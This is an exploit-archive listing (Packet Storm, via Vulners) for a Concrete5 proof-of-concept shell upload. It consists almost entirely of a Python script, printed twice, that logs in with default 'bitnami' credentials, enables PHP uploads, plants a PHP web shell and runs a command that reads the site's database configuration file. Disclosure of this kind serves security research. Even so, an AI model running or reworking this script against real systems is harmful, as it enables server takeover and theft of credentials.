Search...

Concrete5 Proof Of Concept Shell Upload

2017-05-28T00:00:00

ID PACKETSTORM:142732
Type packetstorm
Reporter Cody Sixteen
Modified 2017-05-28T00:00:00

Description

                                        
                                            `c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py  
#!/usr/bin/env python  
# shell-concrete5.py - module based on previous version  
# created 29.04.2017. Bug ('feature') is exploitable only  
# when you will have a valid credentials.  
import sys  
import re  
import requests  
  
target = raw_input("[+] Hostname&gt; ")  
logMe = target + '/index.php/login'  
session = requests.session()  
  
initreq = session.get(logMe)  
initresp = initreq.text  
  
gettoken = re.compile('&lt;input type="hidden" name="ccm_token" value="(.*?)"/&gt;')  
found = re.search(gettoken, initresp)  
  
if found:  
token = found.group(1)  
print '[+] Found token: ' + str(token)  
  
  
# assuming token is valid, let's log in  
login_data = {  
'uName':'user',  
'uPassword':'bitnami',  
'ccm_token':token  
}  
loglink = target + '/index.php/login/authenticate/concrete'  
loginreq = session.post(loglink, data=login_data)  
  
#afterlogin = target + '/index.php/dashboard/system'  
afterlogin = target + '/index.php/dashboard/system/files/filetypes'  
nextreq1 = session.get(afterlogin)  
nextresp1 = nextreq1.text  
print '[+] Cool, we\'re logged-in!'  
#print afterlogin  
#print nextresp1  
print '[+] We are ready to go, extension-page is available.'  
print ''  
  
# construct POST with new.ext  
newToken = re.compile('&lt;input type="hidden" name="ccm_token" value="(.*?)"/&gt;')  
foundToken = re.search(newToken, nextresp1)  
  
if foundToken:  
newOne = foundToken.group(1)  
print '[+] New token grabbed: ' + str(newOne)  
  
data_ext = {  
'ccm_token':newOne,  
'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'  
}  
datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'  
datareq = session.post(datalink, data=data_ext)  
dataresp = datareq.text  
nowwecan = re.compile('file-access-file-types" class="form-control" rows="3"&gt;(.*?)&lt;/textarea&gt;')  
newexts = re.search(nowwecan, dataresp)  
  
if newexts:  
print '[+] Available now: '+ newexts.group(1)  
  
print '[+] Time to upload shell...'  
  
# next token to upload request  
nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'  
tokreq3 = session.get(nextTokenUrl)  
tokresp3 = tokreq3.text  
  
grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/&gt;')  
foundit = re.search(grabNextTok, tokresp3)  
  
if foundit:  
tokentoup = foundit.group(1)  
print '[+] Next token (3rd): ' + str( tokentoup )  
  
# we are logged-in; preparing req to upload shell  
saymyname = 'meshell3.php'  
  
fp = open(saymyname,'w')  
fp.write('&lt;?php system($_GET["xx"]);')  
fp.close()  
  
# tmpshfile ready, do req now  
up_files = { 'file':open(saymyname,'rb') }  
  
up_params = {  
'ccm_token':tokentoup,  
'filename':saymyname,  
'currentFolder':'0'  
}  
upreqlink = target + '/index.php/ccm/system/file/upload'  
upreqnow = session.post(upreqlink, files=up_files, data=up_params)  
upresp = upreqnow.text  
if saymyname in upresp:  
print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'  
  
searchme = target + '/index.php/dashboard/files/search'  
dosearch = session.get(searchme)  
meresp = dosearch.text  
  
searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')  
foundShLink = re.search(searchShLink, meresp)  
  
if foundShLink:  
foundId = foundShLink.group(3)  
shid = foundId.strip('\/')  
print '[+] Found link ID:' + str(shid)  
  
preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)  
prepreq = session.get(preparingProp)  
prepresp = prepreq.text  
whereareutxt = '&lt;a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'"&gt;'  
whereareu = re.compile(whereareutxt)  
foundme2 = re.search(whereareu, prepresp)  
  
if foundme2:  
print '[+] Shell is ready to use:'  
shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'  
print ' ' + shellshere  
  
print '[+] "Finish him!" ;7'  
finish = session.get(shellshere)  
fintxt = finish.text  
print '[+] Response:'  
print fintxt  
print '\n---------------'  
  
else:  
print '[-] I can not upload our shell. Verify!'  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:142732", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Concrete5 Proof Of Concept Shell Upload", "description": "", "published": "2017-05-28T00:00:00", "modified": "2017-05-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/142732/Concrete5-Proof-Of-Concept-Shell-Upload.html", "reporter": "Cody Sixteen", "references": [], "cvelist": [], "lastseen": "2017-05-31T13:20:10", "viewCount": 12, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-05-31T13:20:10", "rev": 2}, "dependencies": {"references": [], "modified": "2017-05-31T13:20:10", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/142732/shell-concrete5.py.txt", "sourceData": "`c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py \n#!/usr/bin/env python \n# shell-concrete5.py - module based on previous version \n# created 29.04.2017. Bug ('feature') is exploitable only \n# when you will have a valid credentials. \nimport sys \nimport re \nimport requests \n \ntarget = raw_input(\"[+] Hostname> \") \nlogMe = target + '/index.php/login' \nsession = requests.session() \n \ninitreq = session.get(logMe) \ninitresp = initreq.text \n \ngettoken = re.compile('<input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfound = re.search(gettoken, initresp) \n \nif found: \ntoken = found.group(1) \nprint '[+] Found token: ' + str(token) \n \n \n# assuming token is valid, let's log in \nlogin_data = { \n'uName':'user', \n'uPassword':'bitnami', \n'ccm_token':token \n} \nloglink = target + '/index.php/login/authenticate/concrete' \nloginreq = session.post(loglink, data=login_data) \n \n#afterlogin = target + '/index.php/dashboard/system' \nafterlogin = target + '/index.php/dashboard/system/files/filetypes' \nnextreq1 = session.get(afterlogin) \nnextresp1 = nextreq1.text \nprint '[+] Cool, we\\'re logged-in!' \n#print afterlogin \n#print nextresp1 \nprint '[+] We are ready to go, extension-page is available.' \nprint '' \n \n# construct POST with new.ext \nnewToken = re.compile('<input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfoundToken = re.search(newToken, nextresp1) \n \nif foundToken: \nnewOne = foundToken.group(1) \nprint '[+] New token grabbed: ' + str(newOne) \n \ndata_ext = { \n'ccm_token':newOne, \n'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone' \n} \ndatalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions' \ndatareq = session.post(datalink, data=data_ext) \ndataresp = datareq.text \nnowwecan = re.compile('file-access-file-types\" class=\"form-control\" rows=\"3\">(.*?)</textarea>') \nnewexts = re.search(nowwecan, dataresp) \n \nif newexts: \nprint '[+] Available now: '+ newexts.group(1) \n \nprint '[+] Time to upload shell...' \n \n# next token to upload request \nnextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0' \ntokreq3 = session.get(nextTokenUrl) \ntokresp3 = tokreq3.text \n \ngrabNextTok = re.compile('input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfoundit = re.search(grabNextTok, tokresp3) \n \nif foundit: \ntokentoup = foundit.group(1) \nprint '[+] Next token (3rd): ' + str( tokentoup ) \n \n# we are logged-in; preparing req to upload shell \nsaymyname = 'meshell3.php' \n \nfp = open(saymyname,'w') \nfp.write('<?php system($_GET[\"xx\"]);') \nfp.close() \n \n# tmpshfile ready, do req now \nup_files = { 'file':open(saymyname,'rb') } \n \nup_params = { \n'ccm_token':tokentoup, \n'filename':saymyname, \n'currentFolder':'0' \n} \nupreqlink = target + '/index.php/ccm/system/file/upload' \nupreqnow = session.post(upreqlink, files=up_files, data=up_params) \nupresp = upreqnow.text \nif saymyname in upresp: \nprint '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')' \n \nsearchme = target + '/index.php/dashboard/files/search' \ndosearch = session.get(searchme) \nmeresp = dosearch.text \n \nsearchShLink = re.compile(saymyname+'\",\"urlInline\":\"http:(.*?)download_file(.*?)view_inline(.*?)\",\"urlDownload\":') \nfoundShLink = re.search(searchShLink, meresp) \n \nif foundShLink: \nfoundId = foundShLink.group(3) \nshid = foundId.strip('\\/') \nprint '[+] Found link ID:' + str(shid) \n \npreparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid) \nprepreq = session.get(preparingProp) \nprepresp = prepreq.text \nwhereareutxt = '<a target=\"_blank\" href=\"(.*?)/application/files/(.*?)' + saymyname +'\">' \nwhereareu = re.compile(whereareutxt) \nfoundme2 = re.search(whereareu, prepresp) \n \nif foundme2: \nprint '[+] Shell is ready to use:' \nshellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id' \nprint ' ' + shellshere \n \nprint '[+] \"Finish him!\" ;7' \nfinish = session.get(shellshere) \nfintxt = finish.text \nprint '[+] Response:' \nprint fintxt \nprint '\\n---------------' \n \nelse: \nprint '[-] I can not upload our shell. Verify!' \n \n`\n"}